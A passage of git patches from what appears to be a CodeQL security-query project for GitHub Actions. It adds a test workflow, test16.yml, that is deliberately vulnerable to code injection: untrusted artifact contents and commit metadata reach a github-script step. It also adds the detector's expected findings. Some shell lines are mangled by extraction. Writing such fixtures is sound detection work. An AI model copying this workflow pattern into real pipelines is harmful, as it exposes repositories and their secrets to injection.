branches.extend(branches_response.json()) - branches_url = branches_response.links.get("next", {}).get("url") - - # Compile the regex pattern - pattern = re.compile(regex_pattern) - - # Search file contents in each branch - for branch in branches: - branch_name = branch["name"] - file_url = f"{base_url}/repos/{repo_nwo}/contents/{file_path}?ref={branch_name}" - - while True: - file_response = requests.get(file_url, headers=headers) - - if file_response.status_code == 200: - file_content = file_response.json()["content"] - - decoded_content = base64.b64decode(file_content).decode("utf-8") - - if pattern.search(decoded_content): - print(f"Match found in branch: {branch_name}!!!!!") - else: - print(f"No match found in branch: {branch_name}") - break - elif file_response.status_code == 404: - print(f"File not found in branch: {branch_name}") - break - elif ( - file_response.status_code == 403 - and "X-RateLimit-Remaining" in file_response.headers - ): - if int(file_response.headers["X-RateLimit-Remaining"]) == 0: - reset_time = int(file_response.headers["X-RateLimit-Reset"]) - sleep_time = reset_time - int(time.time()) + 1 - print(f"Rate limit exceeded. Waiting for {sleep_time} seconds.") - time.sleep(sleep_time) - - -if __name__ == "__main__": - if len(sys.argv) != 4: - print("Usage: python search_branches.py ") - sys.exit(1) - - repo_nwo = sys.argv[1] - file_path = sys.argv[2] - regex_pattern = sys.argv[3] - - print( - f"Searching branches in {repo_nwo} for {file_path} with pattern {regex_pattern}" - ) - search_branches(repo_nwo, file_path, regex_pattern) From 3b95ae0b531c9555bb2318b8f54b556edcce132b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 12:15:58 +0200 Subject: [PATCH 583/707] Bump QLPacks versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 229b1f81c7be..82891e5c0173 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.66 +version: 0.1.67 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e03e2a45cb72..fb4416ffb1d6 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.66 +version: 0.1.67 groups: [actions, queries] suites: codeql-suites extractor: javascript From ff17d1dcb1d243238644816e59faae13edd84290 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 12:50:11 +0200 Subject: [PATCH 584/707] Add CmdI test --- ql/src/Debug/partial.ql | 4 +- .../CWE-094/.github/workflows/test16.yml | 231 ++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 27 ++ .../CWE-094/CodeInjectionMedium.expected | 23 ++ 4 files changed, 284 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index cb8ba7873d8c..c1578220b6be 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -18,7 +18,9 @@ import PartialFlow::PartialPathGraph private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - source.getLocation().getFile().getBaseName() = "non-existant-test.yml" + //source.getLocation().getFile().getBaseName() = "non-existant-test.yml" + source.getLocation().getFile().getBaseName() = "test16.yml" and + source.getLocation().getStartLine() = 125 } predicate isSink(DataFlow::Node sink) { none() } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml new file mode 100644 index 000000000000..0b3002506a14 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml @@ -0,0 +1,231 @@ +name: 📤 Preview Deploy + +on: + workflow_run: + workflows: + - 🎬 Setup + types: + - completed + +permissions: + contents: read + pull-requests: write + +jobs: + setup: + if: ${{ github.event.workflow_run.conclusion == 'success' }} + runs-on: ubuntu-latest + + outputs: + id: ${{ steps.pr.outputs.value }} + ref: ${{ steps.ref.outputs.value }} + repo: ${{ steps.repo.outputs.value }} + + steps: + # Get PR id from artifact + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + run_id: ${{ github.event.workflow_run.id }} + name: pr-id + + - name: get PR id + id: pr + run: echo "value=$(> $GITHUB_OUTPUT + + # Get PR ref from artifact + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + run_id: ${{ github.event.workflow_run.id }} + name: pr-ref + + - name: get PR ref + id: ref + run: echo "value=$(> $GITHUB_OUTPUT + + # Get PR repo from artifact + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + run_id: ${{ github.event.workflow_run.id }} + name: pr-repo + + - name: get PR repo + id: repo + run: echo "value=$(> $GITHUB_OUTPUT + + prepare: + runs-on: ubuntu-latest + needs: [setup] + + steps: + # ================= Create Comment ================= + - name: 🧽 Find And Delete Comment + uses: peter-evans/find-comment@v2 + if: ${{ needs.setup.outputs.id != '' }} + id: fc + with: + issue-number: ${{ needs.setup.outputs.id }} + comment-author: 'github-actions[bot]' + body-includes: View Deployment + + - name: 📠Create or update comment + uses: peter-evans/create-or-update-comment@v3 + if: ${{ needs.setup.outputs.id != '' }} + with: + comment-id: ${{ steps.fc.outputs.comment-id }} + issue-number: ${{ needs.setup.outputs.id }} + body: | + ## View Deployment + + [#${{ github.run_id }}](https://github.com/dream-num/univer/actions/runs/${{ github.run_id }}) + +

+ 🥠🔠🥓 🥗 🥘 🌯 🚠🛠🖠🭠🧠ðŸ 🥪 🥖 ðŸª
+ Still cooking, please come back later
+ 🥙 🥮 🥨 🌭 🦠🙠🕠🰠🮠🜠🡠🱠🿠🕠🥟 +

+ edit-mode: replace + + build-demo: + runs-on: ubuntu-latest + needs: [setup] + + outputs: + preview-url: ${{ steps.vercel-demo-dev.outputs.preview-url == '' && steps.vercel-demo.outputs.preview-url || steps.vercel-demo-dev.outputs.preview-url }} + commit-message: ${{ steps.commit-message.outputs.value }} + + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + repository: ${{ needs.setup.outputs.repo }} + ref: ${{ needs.setup.outputs.ref }} + + - name: Setup pnpm + uses: pnpm/action-setup@v4 + with: + run_install: false + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 20 + cache: pnpm + + - name: Install dependencies + run: pnpm install + + - name: Get commit message + id: commit-message + run: echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT + + # ================= Deploy Demo ================= + - name: 📦 Build demo + run: pnpm build:demo + + - name: Copy demo to workspace + run: | + mkdir .workspace + cp -r ./examples/local/* .workspace + + - name: 🚀 Deploy to Vercel (demo) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref == '' }} + id: vercel-demo + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID}} + vercel-args: --prod + + - name: 🚀 Deploy to Vercel (demo) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref != '' }} + id: vercel-demo-dev + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID}} + + build-storybook: + runs-on: ubuntu-latest + needs: [setup] + + outputs: + preview-url: ${{ steps.vercel-storybook-dev.outputs.preview-url == '' && steps.vercel-storybook.outputs.preview-url || steps.vercel-storybook-dev.outputs.preview-url }} + + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + repository: ${{ needs.setup.outputs.repo }} + ref: ${{ needs.setup.outputs.ref }} + + - name: Setup pnpm + uses: pnpm/action-setup@v4 + with: + run_install: false + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 20 + cache: pnpm + + - name: Install dependencies + run: pnpm install + + # ================= Deploy Storybook ================= + - name: 📦 Build storybook + run: pnpm storybook:build + + - name: 🚀 Deploy to Vercel (demo) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref == '' }} + id: vercel-storybook + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID_STORYBOOK}} + vercel-args: --prod + + - name: 🚀 Deploy to Vercel (storybook) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref != '' }} + id: vercel-storybook-dev + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID_STORYBOOK}} + + notify: + runs-on: ubuntu-latest + needs: [setup, build-demo, build-storybook] + + steps: + - name: Invoke deployment hook + uses: actions/github-script@v3 + with: + script: > + { + "type": "build", + "workflow": { + "id": "${{ github.run_id }}" + }, + "commit": { + "ref": "${{ needs.setup.outputs.ref }}", + "message": "${{ needs.build-demo.outputs.commit-message }}", + "id": "${{ github.event.workflow_run.head_commit.id }}", + "author": "${{ github.event.workflow_run.head_commit.author.name }}" + }, + "preview": { + "📑 Examples": "${{ needs.build-demo.outputs.preview-url }}/", + "📚 Storybook": "${{ needs.build-storybook.outputs.preview-url }}/" + } + } + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 4c9ea8fe8ca4..699d53da9cc1 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -145,6 +145,16 @@ edges | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | provenance | | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | provenance | | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | provenance | | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | provenance | | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | provenance | | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | provenance | | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -449,6 +459,19 @@ nodes | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | semmle.label | steps.ref.outputs.value | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | semmle.label | Run Step: ref [value] | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | semmle.label | echo "value=$(> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | semmle.label | Job outputs node [commit-message] | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | semmle.label | steps.commit-message.outputs.value | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | semmle.label | Run Step: commit-message [value] | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | semmle.label | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | needs.build-demo.outputs.commit-message | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -596,6 +619,10 @@ subpaths | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 262912c58a5e..6d33d3cc5691 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -145,6 +145,16 @@ edges | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | provenance | | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | provenance | | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | provenance | | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | provenance | | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | provenance | | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | provenance | | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -449,6 +459,19 @@ nodes | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | semmle.label | Job outputs node [ref] | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | semmle.label | steps.ref.outputs.value | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | semmle.label | Run Step: ref [value] | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | semmle.label | echo "value=$(> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | semmle.label | Job outputs node [commit-message] | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | semmle.label | steps.commit-message.outputs.value | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | semmle.label | Run Step: commit-message [value] | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | semmle.label | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | semmle.label | needs.build-demo.outputs.commit-message | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | semmle.label | needs.setup.outputs.ref | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 2e5379f289e88c64e6c151a7808ed898adea8dbf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 15:10:31 +0200 Subject: [PATCH 585/707] Update expected tests --- .../Security/CWE-074/OutputClobberingHigh.expected | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected index 715e2c4c90cc..af792f1ab65e 100644 --- a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected +++ b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected @@ -1,6 +1,6 @@ edges | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | Config | -| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | Config | | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | provenance | Config | | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | provenance | Config | | .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | | .github/workflows/output1.yml:30:9:35:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | semmle.label | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:39:58 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | semmle.label | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | semmle.label | github.event.comment.body | @@ -24,7 +24,7 @@ nodes subpaths #select | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | -| .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> 